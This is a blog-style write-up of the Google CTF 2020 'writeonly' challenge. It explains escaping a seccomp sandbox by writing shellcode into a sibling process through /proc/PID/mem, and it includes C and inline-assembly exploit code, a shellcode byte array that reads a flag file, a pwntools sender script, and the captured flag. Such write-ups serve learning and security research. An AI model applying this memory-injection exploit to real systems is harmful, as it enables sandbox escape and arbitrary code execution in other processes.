Google CTF 2020: writeonly

I participated in the 2020 Google CTF on the UBC CTF team Maple Bacon. Without their help, I would probably have given up out of frustration. Special thanks to Robert and Filip, who put up with my many questions and my swearing at the computer.

All the files for my solution are available on my GitHub.

I chose this challenge because nobody else on my team was working on it and it looked fairly approachable, especially after I had gotten frustrated with the assembly in the reversing challenge "beginner". Unfortunately, my assumption that I wouldn't have to deal with assembly in this one was completely false, but I fooled myself for long enough to have a proper go at it anyway.

The challenge description reads:

This sandbox executes any shellcode you send. But thanks to seccomp, you won't be able to read /home/user/flag.

What this means in practice is that there is a seccomp filter with an allow-list of system calls that does not include read. However, as the challenge name suggests, write and open are allowed, and this can be abused.

Shellcode in C and scaffolding

The challenge loads whatever you send it into a flat read-write-execute page.

I wanted to write my shellcode in C because, as mentioned, I didn't want to write assembly! So, I endeavored to figure out how to make that happen. This took more time than the challenge itself, but yak shaving is my specialty. I looked around on the internet for options and found SheLLVM, which I couldn't figure out how to use; ShellcodeCompiler, which doesn't support variables; and Binary Ninja scc, which I don't have a license for.

As such, I tried to find prior art on Just Using a Normal Compiler. I found a good blog post with lots of details, but it was clearly trying to hack around properties of how executables are linked (and also I couldn't reproduce their string usage myself successfully, even with -O0).

The specific usage of this shellcode has a lot in common with microcontrollers and other embedded platforms in that the executable is loaded into memory and executed immediately. Eventually this led to messing about with linker scripts and staring at both binutils documentation and various linker scripts for bare-metal platforms.

I ended up writing the following linker script to ensure that all the functions were laid out as expected, annotating my _start function with __attribute__((section(".text.prologue"))) to make sure it gets put on top. It also stuffs the .rodata section into .text to simplify the binary layout (unsure if this is actually necessary).

ENTRY(_start);

SECTIONS
{
    . = ALIGN(16);
    .text :
    {
        *(.text.prologue)
        *(.text)
        *(.rodata)
    }
    .data :
    {
        *(.data)
    }

    /DISCARD/ :
    {
        *(.interp)
        *(.comment)
    }
}

Once the ELF is built (having this intermediate form is critical for debugging so I can find addresses of things and have symbols while reading the output assembly), it is objcopy'd with -O binary to emit the final shellcode binary that can be loaded directly into memory and executed.

The path to privilege escalation

Auditing the code for the challenge, I found that it forks a second process before dropping privileges. That child runs a function, check_flag, in an infinite loop, checking the validity of the flag. This seemed pretty suspicious, since there is no reason to overwrite the flag (doing so would lose it).

pid_t pid = check(fork(), "fork");
if (!pid) {
  while (1) {
    check_flag();
  }
  return 0;
}

// ⬇ this is suspicious!!
printf("[DEBUG] child pid: %d\n", pid);
void_fn sc = read_shellcode();
setup_seccomp();
sc();

My path to the solution started with poking around procfs to see what could be abused. I struggled with /proc/$pid/stack, which often appears to be inaccessible. I also initially failed to figure out how /proc/$pid/mem worked, and assumed that it did not work at all after seeing an I/O error.

As it turns out, this mem virtual file exposes the process's entire address space as a file: you can lseek to any address in it and use write to poke the memory there. That sounded like a way to take over execution using only write(2), so it was what I went with.
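The lseek-then-write mechanic can be tried safely against your own process. The following is a minimal Linux-only sketch in Python rather than the C used for the exploit; the `victim` buffer is a hypothetical stand-in for the target's memory, and the snippet assumes the environment allows a process to open its own /proc/self/mem for writing. It does not demonstrate the read-only case discussed later.

```python
import ctypes
import os

# A buffer in our own address space stands in for the target's memory.
victim = ctypes.create_string_buffer(b"original contents")
addr = ctypes.addressof(victim)

# The file offset in /proc/<pid>/mem is simply the virtual address.
fd = os.open("/proc/self/mem", os.O_RDWR)
try:
    os.lseek(fd, addr, os.SEEK_SET)
    os.write(fd, b"PATCHED!")
finally:
    os.close(fd)

# The buffer was modified without ever being written to directly.
print(victim.value)
```

In the challenge the same three calls are aimed at the child's PID instead of self, and the address is a location in the child's code.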

Failed ROP attempt

Initially, I wrongly assumed that writes through /proc/$pid/mem respect the mappings' access permissions; a teammate later told me that this is not true. So, I started out trying to write a Return Oriented Programming (ROP) chain to take control of execution.

I used ropper to find gadgets to set up the registers to syscall execve("/bin/cat", "/home/user/flag", NULL). I then overwrote the stack to try to get execution to go to my execve(2) after the return from nanosleep(2), assuming it would be fairly reliable since the process spends most of its time in this syscall. This got close to working. After taking a break to sleep, though, I was informed that /proc/$pid/mem can actually change read-only memory regions, so I changed my approach to simply overwriting the process's .text section with some shellcode.

The exploit

High level overview:

fd = open("/proc/$childPid/mem", O_RDWR)
lseek(fd, injectPos, SEEK_SET)
write(fd, evilCode, sizeof (evilCode))

Now that I have the pieces together and can execute C in-process, it's time to write an exploit. One of the first things I have to contend with is constructing a path to /proc/$pid/mem. Well, I can't call getpid() due to the syscall filter, and it would only return my own PID rather than the child's anyway. This was the first challenge. I read the disassembly of the main function to try to find the PID, since it would have been returned from fork and it is logged by the suspicious printf. As it turned out, it was indeed on the stack, so I wrote some evil inline assembly to get the value pointed to by rbp - 0x4.

The next step was to construct the path. I was unsure of the availability of C string and itoa-like functions in the environment, given that there is no standard library present, so I just wrote some. An interesting optimization, nicked from later rewriting the exploit in Rust, is that my itoa goes backwards, writing into a buffer that contains extra slashes, which the OS will otherwise ignore. This cut my executable size about in half, because I did not have to reverse the string or perform string copies as one would in a normal itoa.

    int pid;
    // well, we weren't allowed getpid so,
    // steal the pid from the caller's stack
    __asm__ __volatile__ (
        "mov %0, dword ptr [rbp - 0x4]\n"
        : "=r"(pid) ::);
    char pathbuf[64] = "/proc////////////mem";
    itoa_badly(pid, &pathbuf[15]);
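The backwards itoa trick can be sketched as follows. This is in Python for readability, not the C used in the exploit; `itoa_backwards` and its signature are hypothetical and are not the author's `itoa_badly`. The digits are written right to left, ending at a fixed index, so whatever slashes are left in front of them simply collapse when the path is resolved.

```python
import posixpath


def itoa_backwards(value: int, buf: bytearray, last: int) -> None:
    """Write the decimal digits of a non-negative value into buf,
    right to left, with the final digit landing at index `last`."""
    pos = last
    while True:
        buf[pos] = ord("0") + value % 10
        value //= 10
        pos -= 1
        if value == 0:
            break


# "/proc" followed by 12 padding slashes and "mem"; index 15 is the last
# digit slot, and index 16 stays a '/' separating the PID from "mem".
path = bytearray(b"/proc" + b"/" * 12 + b"mem")
itoa_backwards(1234, path, 15)
print(path.decode())

# Repeated slashes are equivalent to a single one when the path is resolved.
print(posixpath.normpath(path.decode()))
```

No reversal and no copy are needed, because the least significant digit is produced first and is also the one that belongs furthest to the right.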

Syscalls were performed with more inline assembly, this time lifted directly from the musl sources. Part of my motivation in not using a libc, besides binary size, is that libc requires a bunch more sections to be present in my binary, and I did not want to have to research how to deal with those.

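I chose to inject my stage 2 shellcode at the jmp that sends the check_flag loop back to its beginning. This is also the return address of the call to sleep, and since the child spends nearly all of its time sleeping, the overwritten instructions are unlikely to be mid-execution when the write lands, so it should work most of the time.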

Stage 2 shellcode was generated with pwntools shellcraft. It was fairly trivial.

    int fd = syscall2(SYS_open, (uint64_t)(void *)pathbuf, O_RDWR);

    /* disassemble check_flag
     * (...)
     * 0x00000000004022d9 <+167>:   mov    edi,0x1
     * 0x00000000004022de <+172>:   call   0x44f2e0 <sleep>
     * 0x00000000004022e3 <+177>:   jmp    0x40223a <check_flag+8>
     */
    void *tgt = (void *)0x4022e3;
    syscall3(SYS_lseek, fd, (uint64_t)tgt, SEEK_SET);

    //////////////////////////////////////////////////////////////
    // Now, just write shellcode into memory at the injection point.
    /*
     * In [4]: sh = shellcraft.amd64.cat('/home/user/flag', 1) + shellcraft.amd64.infloop()
     * In [5]: print(sh)
     *     / * push b'/home/user/flag\x00' * /
     *     mov rax, 0x101010101010101
     *     push rax
     *     mov rax, 0x101010101010101 ^ 0x67616c662f7265
     *     xor [rsp], rax
     *     mov rax, 0x73752f656d6f682f
     *     push rax
     *     / * call open('rsp', 'O_RDONLY', 0) * /
     *     push SYS_open / * 2 * /
     *     pop rax
     *     mov rdi, rsp
     *     xor esi, esi / * O_RDONLY * /
     *     cdq / * rdx=0 * /
     *     syscall
     *     / * call sendfile(1, 'rax', 0, 2147483647) * /
     *     mov r10d, 0x7fffffff
     *     mov rsi, rax
     *     push SYS_sendfile / * 0x28 * /
     *     pop rax
     *     push 1
     *     pop rdi
     *     cdq / * rdx=0 * /
     *     syscall
     *     jmp $
     * In [7]: [hex(x) for x in asm(sh)]
     */
    /* unsigned char, since several bytes are above 0x7f */
    unsigned char evil[] = {0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50,
        0x48, 0xb8, 0x64, 0x73, 0x2e, 0x67, 0x6d, 0x60, 0x66, 0x1, 0x48, 0x31,
        0x4, 0x24, 0x48, 0xb8, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x75, 0x73,
        0x50, 0x6a, 0x2, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x99, 0xf, 0x5,
        0x41, 0xba, 0xff, 0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28,
        0x58, 0x6a, 0x1, 0x5f, 0x99, 0xf, 0x5, 0xeb, 0xfe};

    syscall3(SYS_write, fd, (uint64_t)(void *)evil, sizeof (evil));
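The three mov immediates at the top of the shellcraft listing look opaque, so here is a small check of what they leave on the stack. It is only a sketch that redoes the arithmetic from the listing in Python; the variable names are mine. The second half of the path is stored XORed with a 0x01 mask, presumably so that the encoded instructions contain no NUL bytes.

```python
import struct

MASK = 0x0101010101010101

# Immediates copied from the shellcraft listing.
xored_tail = MASK ^ 0x0067616C662F7265  # second "mov rax, ..."
head = 0x73752F656D6F682F               # third "mov rax, ..."

# push MASK; xor [rsp], xored_tail  => the qword at rsp is MASK ^ xored_tail
tail = MASK ^ xored_tail

# head is pushed last, so it sits at the lower address and comes first.
path = struct.pack("<Q", head) + struct.pack("<Q", tail)
print(path)

# The XORed immediate as it appears in the byte array (after 0x48, 0xb8).
encoded = bytes([0x64, 0x73, 0x2E, 0x67, 0x6D, 0x60, 0x66, 0x01])
assert struct.pack("<Q", xored_tail) == encoded
```

The resulting 16 bytes are the NUL-terminated string /home/user/flag, which is what rsp points at when the open syscall is made.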

I sent it with a simple pwntools script:

import os
import sys
from pwn import *

f = sys.argv[1]
fd = open(f, 'rb')
stat = os.stat(f)
sz = stat.st_size

io = remote('writeonly.2020.ctfcompetition.com', 1337)

# for `make serve`
# io = remote('localhost', 8000)

# you can gdb into the parent before we send malicious code
input()
# pwntools expects bytes on Python 3
io.sendline(str(sz).encode())
io.send(fd.read())
io.interactive()

Then, the exciting moment:

ctf/writeonly » make send
python send.py shellcode.bin
[+] Opening connection to writeonly.2020.ctfcompetition.com on port 1337: Done

[*] Switching to interactive mode
[DEBUG] child pid: 2
shellcode length? reading 576 bytes of shellcode. CTF{why_read_when_you_can_write}
$

Learnings

Many. The one thing I did really right was making it easy to try again. Writing a Makefile for the various things I needed to run was immensely valuable so I didn't have to remember commands.

Late in the process I had a lot of trouble debugging a problem where the exploit chain worked on local processes but not remotely. It turned out that my injection point could corrupt the execution state of the checking process, depending on where that process was executing when the write landed; moving the injection point fixed it. However, I initially thought it was ASLR, so I fought with gdb a bunch about that.

Filip suggested that I use socat TCP-LISTEN:8000,bind=localhost,reuseaddr,fork EXEC:./chal to emulate the challenge server locally, and then debug the process it spawns as if it were the remote one. A process that is not started under gdb is more likely to reproduce what happens on the remote. This helped a lot in eliminating that as a variable while debugging.